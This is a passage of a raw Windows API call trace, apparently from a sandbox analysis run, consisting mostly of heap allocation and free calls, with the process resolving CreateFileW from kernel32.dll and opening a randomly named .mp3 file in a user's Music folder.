out: hHeap=0x1780000) returned 1 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0110.378] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0110.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0110.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0110.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0110.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0110.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0110.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0110.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0110.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0110.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0110.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0110.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0110.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0110.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0110.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0110.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0110.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0110.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0110.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0110.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0110.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0110.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0110.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0110.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0110.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0110.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0110.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0110.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0110.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0110.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0110.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0110.381] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0110.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0110.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0110.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0110.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0110.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0110.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0110.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0110.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0110.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0110.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0110.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0110.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0110.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0110.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0110.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0110.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0110.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0110.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0110.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0110.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0110.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0110.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0110.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0110.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0110.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0110.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0110.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0110.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0110.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0110.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0110.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0110.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0110.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0110.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0110.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0110.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0110.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0110.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0110.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0110.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0110.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0110.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0110.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0110.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0110.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0110.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0110.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0110.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0110.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.384] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0110.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0110.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0110.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0110.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1c0 [0110.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca1c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0110.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0110.384] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0110.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0110.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0110.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0110.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0110.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0110.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0110.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0110.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0110.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0110.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0110.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0110.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0110.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0110.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0110.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0110.385] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\gXtG5sqySgJuIPIsH.mp3" (normalized: "c:\\users\\fd1hvy\\music\\gxtg5sqysgjuipish.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0110.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0110.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9578 [0110.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0110.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0110.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0110.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0110.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0110.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0110.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0110.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0110.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0110.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0110.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0110.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0110.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0110.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0110.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0110.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0110.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0110.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0110.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0110.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0110.387] FreeLibrary (hLibModule=0x772d0000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0110.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0110.388] HeapFree (in: hHeap=0x1780000, 